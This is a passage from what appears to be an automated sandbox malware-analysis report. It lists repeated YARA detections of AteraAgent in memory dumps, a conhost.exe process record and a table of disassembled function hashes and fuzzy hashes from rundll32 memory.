                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2679569967.0000029E21543000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2790839667.0000029E3B6D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E21F52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E22363000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2788198882.0000029E3B3C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E22003000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E223B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2787905123.0000029E3B3C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2689903902.0000029E21700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2679569967.0000029E214C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2679569967.0000029E214FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2679569967.0000029E214C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E223E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2790839667.0000029E3B5E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2787431143.0000029E3B1B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E21F5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2790839667.0000029E3B677000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E21CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2679569967.0000029E214DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2788675042.0000029E3B3D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E223A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E21F68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E2219C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E2227C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E22130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2678844243.0000029E21300000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2679569967.0000029E21505000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E222D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2695077269.0000029E223ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:61
                                                                                                                                                                                                                                                                                              Start time:06:59:22
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 06F91630 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3550614674
                                                                                                                                                                                                                                                                                                • Opcode ID: 3d064fa02919d8d8918c028ac390bb26164d4a2940bb291ea53a1c2a508aa247
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f8e005be1cfce732801411eb6a98a422e98ab964dfacaa7c6795294f55a1f86
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d064fa02919d8d8918c028ac390bb26164d4a2940bb291ea53a1c2a508aa247
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2351C136B0020A8FDB55DFB8D9505AFBBFAAFC9350B14853AE814D7364DA349C11C7A1
                                                                                                                                                                                                                                                                                                Function 06F91080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: e93b882ad063cdb736447ed854d55119a0e10f5e4f561405fad288a76c5850bc
                                                                                                                                                                                                                                                                                                • Instruction ID: 1d45e4f28e16680c459dd0f8c2ae3839fae29ba5ee7d5ea9fe04ac91d92e56db
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e93b882ad063cdb736447ed854d55119a0e10f5e4f561405fad288a76c5850bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB719435F002199FEF55EB75C954A6EBAA7AFC8200F148039D506EB3A4DE31DC42C7A1
                                                                                                                                                                                                                                                                                                Function 06F92644 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: c564fbe14e02aeaf05214dea45de1c67b06bbad0347b8bacdc51cebc35497c38
                                                                                                                                                                                                                                                                                                • Instruction ID: fb19e7defe249ae48925437f746b6ffbdcc3b0b4b6f6634969a03206cace38e3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c564fbe14e02aeaf05214dea45de1c67b06bbad0347b8bacdc51cebc35497c38
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81312326F283582BEFA97A39581437E7FEBDFC1254F04846AD901C7682DE649D0583B2
                                                                                                                                                                                                                                                                                                Function 06F90C1C Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 370f0babee371a587fc18f622bdac1e74d1a2b5a4e0749f73233655492ec7901
                                                                                                                                                                                                                                                                                                • Instruction ID: 765d91c48a3f67ad0a40e331d12cc612c6244515cd8e5c1025b4e6b7d29ed1d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 370f0babee371a587fc18f622bdac1e74d1a2b5a4e0749f73233655492ec7901
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C331E431B092495FFB98AA798C243BF7BE79BC5300F14846EE502A72C5CE755C0587B2
                                                                                                                                                                                                                                                                                                Function 06F92764 Relevance: .4, Instructions: 392COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 442809d5980218eb444a5f782a71c43c453d90090f21a5d572846d30eb7b9b6e
                                                                                                                                                                                                                                                                                                • Instruction ID: 0b9b555cc0055391020348a41559362b6d9c22a1683f2812783224e8ac75e841
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 442809d5980218eb444a5f782a71c43c453d90090f21a5d572846d30eb7b9b6e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0E092B580430A9FC790EF79880125ABFF0BF55200B6046AED448D3601F7329642CBA1
                                                                                                                                                                                                                                                                                                Function 06F923B8 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6dba3acd0ba70b679e6a032f2527474be33241adfb9173d15e6461acb663a894
                                                                                                                                                                                                                                                                                                • Instruction ID: 1c9e39f261f1f22c4eced628a2213b7df2992a90841d873971cc7a3bb45eb37e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6dba3acd0ba70b679e6a032f2527474be33241adfb9173d15e6461acb663a894
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6751DC31F212059FDB50CB6CD980A6ABBF1FF88304B1081A6E518DB262EB31DD41CBA0
                                                                                                                                                                                                                                                                                                Function 06F92268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1b9b08ed314704cbac276258ea62f3a8987ba0ce98d64f22db05319f3c526ad9
                                                                                                                                                                                                                                                                                                • Instruction ID: c27acde58639656d370f92ad926ff4fcf24f1855be5c32281070b59eb722b817
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b9b08ed314704cbac276258ea62f3a8987ba0ce98d64f22db05319f3c526ad9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07410635F101189FDB94DF68D98099EBBB6FF88310B10816AE905EB364DB31ED41CBA0
                                                                                                                                                                                                                                                                                                Function 06F91050 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d30d71b9762e5087165751d6acfd84ef3406c63c097f5b9434e0e30753c7d3c2
                                                                                                                                                                                                                                                                                                • Instruction ID: 41b9feeff8ff38bd7bedb6e8a880bd687e7e1b6b9335880063fac02dfe6cfe7c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d30d71b9762e5087165751d6acfd84ef3406c63c097f5b9434e0e30753c7d3c2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35210A36F003559BFF54EE69C9606AE7BEAAF85250F04403BD902C7254EE31C956C7A1
                                                                                                                                                                                                                                                                                                Function 06F92664 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e0db3cbd38307338f4ab1ac3454facb419321fe1583f62db2730357f31dbc74
                                                                                                                                                                                                                                                                                                • Instruction ID: 96baad8de3b256ff6723c5ffc5fab7c2c62044e15a676683db05278cfb2863ff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e0db3cbd38307338f4ab1ac3454facb419321fe1583f62db2730357f31dbc74
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2113D32E6131A6FEB943A686C143BB7BC9DF41370F108436FE5896580DE35858593F0
                                                                                                                                                                                                                                                                                                Function 06F90D4C Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2fd267d300fdd29bf59492cbb172df175afb7bb78426e2555c544cbd0bb26b68
                                                                                                                                                                                                                                                                                                • Instruction ID: d5ab5b6322e6a11b236197bc35317c11aaf6570d73830ea6ac8b9b76d969ab07
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fd267d300fdd29bf59492cbb172df175afb7bb78426e2555c544cbd0bb26b68
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 901155323083541FC714A7BD981076E7FAACFC2260F0004BEE65ACB695EE22CC4083E5
                                                                                                                                                                                                                                                                                                Function 06F92258 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c9dfed2519527f06d78806cb450822ab7ae43c5494ea7bccf61432cd0377b8bb
                                                                                                                                                                                                                                                                                                • Instruction ID: 7e6f602b837401865255c2f464951a46b29464b82049ffdd8f5b0f1bf23825a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9dfed2519527f06d78806cb450822ab7ae43c5494ea7bccf61432cd0377b8bb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23211775E102089FCB94DF69D98199EBBF2FF4C710F10812AE815EB360DB31A941CBA0
                                                                                                                                                                                                                                                                                                Function 06F91378 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5a9b67445fb77935d9676b7cd1000e4f2772439365b0a74ecf382a30c0bd2094
                                                                                                                                                                                                                                                                                                • Instruction ID: 9df7df61b421627811f6646c42a3c330bf4b9addff35ac9b997c4598a40b649b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a9b67445fb77935d9676b7cd1000e4f2772439365b0a74ecf382a30c0bd2094
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 072102B1D002498EDB20DFAAC884AEEFFB4FF88324F10852AD459A7250C7746945CFA1
                                                                                                                                                                                                                                                                                                Function 06F91380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 14ff041e4e90c687fcfd0daae0e8fff86b0b595b290ac2df9baac10ddf2a1242
                                                                                                                                                                                                                                                                                                • Instruction ID: 9d07ecfc07ded6aa7c7c2a942a1b39bee8d66e4216e72479371de7a5fda971bd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14ff041e4e90c687fcfd0daae0e8fff86b0b595b290ac2df9baac10ddf2a1242
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F11F2B1D042498FDB10DFAAC881AEEFBF4FF48324F10842AD459A7250C7746945CFA5
                                                                                                                                                                                                                                                                                                Function 06F91829 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d6a53d9fe35897674d1379d6fbcf7a7816d0fe50f68284f3e9ac320853f07251
                                                                                                                                                                                                                                                                                                • Instruction ID: ff69ead9b3412090f73fdae6f3fe7698ee93d5e7a6e4d81ed244019500b7f3d7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6a53d9fe35897674d1379d6fbcf7a7816d0fe50f68284f3e9ac320853f07251
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3601F232E0011567FBA8EA698C54BEF7EAB9BC8610F11402DE005A3380CE714C0187F1
                                                                                                                                                                                                                                                                                                Function 06F91968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e09b2c00835fc727226f9081ccbc20f195978fc4e015f8cda1635ca96c2e61f7
                                                                                                                                                                                                                                                                                                • Instruction ID: 5ae8d676a483e3ef0c702cf376d40fe07a1f4c2a607b19299bf933b3979aa7b0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e09b2c00835fc727226f9081ccbc20f195978fc4e015f8cda1635ca96c2e61f7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F1194396001099FDB14EFA8D454AA97BB7FF9C324F144029E609E7790CF759C45CBA1
                                                                                                                                                                                                                                                                                                Function 06F91440 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dae723d34f92fb233dcb544dcdfae8e3b74723cfbe68ca64bf12394014853501
                                                                                                                                                                                                                                                                                                • Instruction ID: b9c5e107111492a31141e2adc1a9244870b8d5e99ab60915f05657f077b4af27
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dae723d34f92fb233dcb544dcdfae8e3b74723cfbe68ca64bf12394014853501
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA012B39A1534A1FD7499BBC19311173FABAFD610831515AAC205CF5A1E9244C04CBF2
                                                                                                                                                                                                                                                                                                Function 049BD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1663134577.00000000049BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049BD000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_49bd000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
